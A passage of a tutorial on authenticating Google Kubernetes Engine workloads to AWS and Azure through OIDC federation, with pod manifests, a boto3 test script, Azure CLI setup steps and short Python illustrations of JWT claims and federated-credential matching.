&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="c1"&gt;# gke-cross-cloud-sa SA is created in Scenario 3.1 above&lt;/span&gt;
  &lt;span class="na"&gt;serviceAccountName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gke-cross-cloud-sa&lt;/span&gt;
  &lt;span class="na"&gt;restartPolicy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Never&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aws-test&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;python:3.11-slim&lt;/span&gt;
    &lt;span class="na"&gt;command&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;sh&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;-c&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
        &lt;span class="s"&gt;pip install --no-cache-dir boto3 &amp;amp;&amp;amp; \&lt;/span&gt;
        &lt;span class="s"&gt;python /app/test_aws_from_gke.py&lt;/span&gt;
    &lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AWS_ROLE_ARN&lt;/span&gt;
      &lt;span class="c1"&gt;# Replace ACCOUNT_ID with your AWS account ID&lt;/span&gt;
      &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;arn:aws:iam::YOUR_AWS_ACCOUNT_ID:role/gke-to-aws-role"&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AWS_WEB_IDENTITY_TOKEN_FILE&lt;/span&gt;
      &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/run/secrets/tokens/token&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AWS_REGION&lt;/span&gt;
      &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;us-east-1&lt;/span&gt;
    &lt;span class="na"&gt;volumeMounts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
      &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/app&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aws-token&lt;/span&gt;
      &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/run/secrets/tokens&lt;/span&gt;
      &lt;span class="na"&gt;readOnly&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
    &lt;span class="na"&gt;configMap&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aws-test-code-gke&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aws-token&lt;/span&gt;
    &lt;span class="na"&gt;projected&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;sources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;serviceAccountToken&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;token&lt;/span&gt;
            &lt;span class="na"&gt;expirationSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;3600&lt;/span&gt;
            &lt;span class="na"&gt;audience&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;sts.amazonaws.com"&lt;/span&gt;  &lt;span class="c1"&gt;# must match your AWS OIDC provider audience&lt;/span&gt;

&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ConfigMap&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aws-test-code-gke&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;data&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;test_aws_from_gke.py&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
    &lt;span class="s"&gt;# Code will be provided below&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
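The projected volume in the manifest writes a JWT whose `sub` and `aud` claims are what AWS STS checks against the trust policy's conditions. A self-contained illustration of the claims a decoder would read back out of such a token; the token here is fabricated and unsigned (a real one is signed by the cluster), so this only shows the payload shape:

```python
# Illustrative only: build and decode the payload segment of a fabricated,
# unsigned JWT to show the claims STS compares against the trust policy.
import base64, json

def b64url(data: bytes) -> str:
    # JWT segments are base64url without padding
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

claims = {
    "iss": "https://container.googleapis.com/v1/projects/example/locations/us-central1/clusters/demo",
    "sub": "system:serviceaccount:default:gke-cross-cloud-sa",
    "aud": "sts.amazonaws.com",
}
header = b64url(json.dumps({"alg": "RS256", "typ": "JWT"}).encode())
payload = b64url(json.dumps(claims).encode())
token = f"{header}.{payload}.fake-signature"  # no real signature

# Read the claims back out of the middle segment:
seg = token.split(".")[1]
seg += "=" * (-len(seg) % 4)  # restore base64 padding
decoded = json.loads(base64.urlsafe_b64decode(seg))
print(decoded["sub"], decoded["aud"])
```

The `audience: "sts.amazonaws.com"` field in the `serviceAccountToken` projection is what ends up as the `aud` claim here, which is why it must match the OIDC provider's client ID list.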



&lt;p&gt;&lt;strong&gt;Test Code (Python):&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# test_aws_from_gke.py
&lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;test_aws_access&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;Test AWS S3 access from GKE using OIDC federation&lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
    &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="c1"&gt;# SDK automatically uses OIDC credentials from environment variables
&lt;/span&gt;        &lt;span class="n"&gt;s3_client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;client&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s3&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# List buckets to verify access
&lt;/span&gt;        &lt;span class="n"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;s3_client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;list_buckets&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;✅ AWS Authentication successful!&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Found &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Buckets&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; S3 buckets:&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;bucket&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Buckets&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;][:&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
            &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;  - &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;bucket&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Name&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# Get caller identity
&lt;/span&gt;        &lt;span class="n"&gt;sts_client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;client&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;sts&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;identity&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sts_client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get_caller_identity&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;🔐 Authenticated as: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;identity&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Arn&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;True&lt;/span&gt;
    &lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="nb"&gt;Exception&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;❌ AWS Authentication failed: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;traceback&lt;/span&gt;
        &lt;span class="n"&gt;traceback&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;print_exc&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;__main__&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;test_aws_access&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Success Logs:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If &lt;code&gt;kubectl logs -f -n default gke-aws-test&lt;/code&gt; shows output like the logs below, GKE-to-AWS authentication worked.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;✅ AWS Authentication successful!
Found &amp;lt;number of buckets&amp;gt; S3 buckets:
  - bucket-1
  - bucket-2
  - ...

🔐 Authenticated as: arn:aws:sts::YOUR_AWS_ACCOUNT_ID:assumed-role/gke-to-aws-role/botocore-session-&amp;lt;some random number&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  3.3 Authenticating to Azure from GKE
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Setup Steps:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Make sure you have done `az login` and set the subscription before proceeding&lt;/span&gt;

&lt;span class="c"&gt;# 1. Get GKE OIDC issuer&lt;/span&gt;
&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;gcloud config get-value project&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="nv"&gt;CLUSTER_LOCATION&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"us-central1"&lt;/span&gt;  &lt;span class="c"&gt;# Change to your cluster location&lt;/span&gt;

&lt;span class="nv"&gt;OIDC_ISSUER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;curl &lt;span class="nt"&gt;-s&lt;/span&gt; https://container.googleapis.com/v1/projects/YOUR_PROJECT_ID/locations/us-central1/clusters/my-gke-cluster/.well-known/openid-configuration | jq &lt;span class="nt"&gt;-r&lt;/span&gt; .issuer&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"OIDC Issuer: &lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_ISSUER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;

&lt;span class="c"&gt;# 2. Create Azure AD application&lt;/span&gt;
az ad app create &lt;span class="nt"&gt;--display-name&lt;/span&gt; gke-to-azure-app

&lt;span class="nv"&gt;APP_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az ad app list &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--display-name&lt;/span&gt; gke-to-azure-app &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s2"&gt;"[0].appId"&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"App ID: &lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;APP_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;

&lt;span class="c"&gt;# 3. Create service principal&lt;/span&gt;
az ad sp create &lt;span class="nt"&gt;--id&lt;/span&gt; &lt;span class="nv"&gt;$APP_ID&lt;/span&gt;

&lt;span class="c"&gt;# 4. Create federated credential&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; gke-federated-credential.json &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt;
{
  "name": "gke-federated-identity",
  "issuer": "&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_ISSUER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;",
  "subject": "system:serviceaccount:default:gke-cross-cloud-sa",
  "audiences": [
    "api://AzureADTokenExchange"
  ]
}
&lt;/span&gt;&lt;span class="no"&gt;EOF

&lt;/span&gt;az ad app federated-credential create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--id&lt;/span&gt; &lt;span class="nv"&gt;$APP_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--parameters&lt;/span&gt; gke-federated-credential.json

&lt;span class="c"&gt;# 5. Assign Azure permissions&lt;/span&gt;
&lt;span class="nv"&gt;SUBSCRIPTION_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az account show &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="nb"&gt;id&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;

az role assignment create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--assignee&lt;/span&gt; &lt;span class="nv"&gt;$APP_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt; &lt;span class="s2"&gt;"Storage Blob Data Reader"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--scope&lt;/span&gt; &lt;span class="s2"&gt;"/subscriptions/&lt;/span&gt;&lt;span class="nv"&gt;$SUBSCRIPTION_ID&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;

&lt;span class="c"&gt;# 6. Create resource group (if not exists)&lt;/span&gt;
az group create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; gke-cross-cloud &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--location&lt;/span&gt; eastus &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--subscription&lt;/span&gt; &lt;span class="nv"&gt;$SUBSCRIPTION_ID&lt;/span&gt;

&lt;span class="c"&gt;# 7. Create storage account&lt;/span&gt;
az storage account create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; gkecrosscloud &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--resource-group&lt;/span&gt; gke-cross-cloud &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--location&lt;/span&gt; eastus &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--sku&lt;/span&gt; Standard_LRS &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--kind&lt;/span&gt; StorageV2 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--subscription&lt;/span&gt; &lt;span class="nv"&gt;$SUBSCRIPTION_ID&lt;/span&gt;

&lt;span class="c"&gt;# 8. Create blob container&lt;/span&gt;
az storage container create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; test-container &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--account-name&lt;/span&gt; gkecrosscloud &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--subscription&lt;/span&gt; &lt;span class="nv"&gt;$SUBSCRIPTION_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--auth-mode&lt;/span&gt; login

&lt;span class="c"&gt;# you will need TENANT_ID below&lt;/span&gt;
&lt;span class="nv"&gt;TENANT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az account show &lt;span class="nt"&gt;--query&lt;/span&gt; tenantId &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
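Azure AD accepts the incoming Kubernetes token only when exactly three fields of the federated credential match the token's claims: issuer, subject, and audience. A small sketch of that three-way comparison; the issuer URL is a placeholder, and the match logic is a simplified model of what Azure performs server-side:

```python
# Sketch: the three-way match Azure AD performs between a federated
# credential and the incoming token's claims. Values are placeholders,
# and the comparison is a simplified model of the server-side check.
def federated_credential(issuer, namespace, service_account):
    return {
        "name": "gke-federated-identity",
        "issuer": issuer,
        "subject": f"system:serviceaccount:{namespace}:{service_account}",
        "audiences": ["api://AzureADTokenExchange"],
    }

def token_matches(cred, token_claims):
    return (
        token_claims["iss"] == cred["issuer"]
        and token_claims["sub"] == cred["subject"]
        and token_claims["aud"] in cred["audiences"]
    )

cred = federated_credential(
    "https://container.googleapis.com/v1/projects/example/locations/us-central1/clusters/demo",
    "default", "gke-cross-cloud-sa",
)
claims = {
    "iss": cred["issuer"],
    "sub": "system:serviceaccount:default:gke-cross-cloud-sa",
    "aud": "api://AzureADTokenExchange",
}
print(token_matches(cred, claims))
```

This is why a pod in a different namespace, or using a different ServiceAccount, silently fails the exchange: the `sub` string no longer matches the federated credential.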



&lt;p&gt;&lt;strong&gt;Kubernetes Manifest:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Submit the manifest below to validate Scenario 3.3. If authentication is working, you will see the success logs shown below.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# scenario3-3-gke-to-azure.yaml&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gke-azure-test&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="c1"&gt;# gke-cross-cloud-sa SA is created in Scenario 3.1 above&lt;/span&gt;
  &lt;span class="na"&gt;serviceAccountName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;gke-cross-cloud-sa&lt;/span&gt;
  &lt;span class="na"&gt;restartPolicy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Never&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-test&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;python:3.11-slim&lt;/span&gt;
    &lt;span class="na"&gt;command&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;sh&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;-c&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
        &lt;span class="s"&gt;pip install --no-cache-dir azure-identity azure-storage-blob &amp;amp;&amp;amp; \&lt;/span&gt;
        &lt;span class="s"&gt;python /app/test_azure_from_gke.py&lt;/span&gt;
    &lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AZURE_CLIENT_ID&lt;/span&gt;
      &lt;span class="c1"&gt;# Replace with your actual App ID&lt;/span&gt;
      &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;YOUR_APP_ID"&lt;/span&gt;
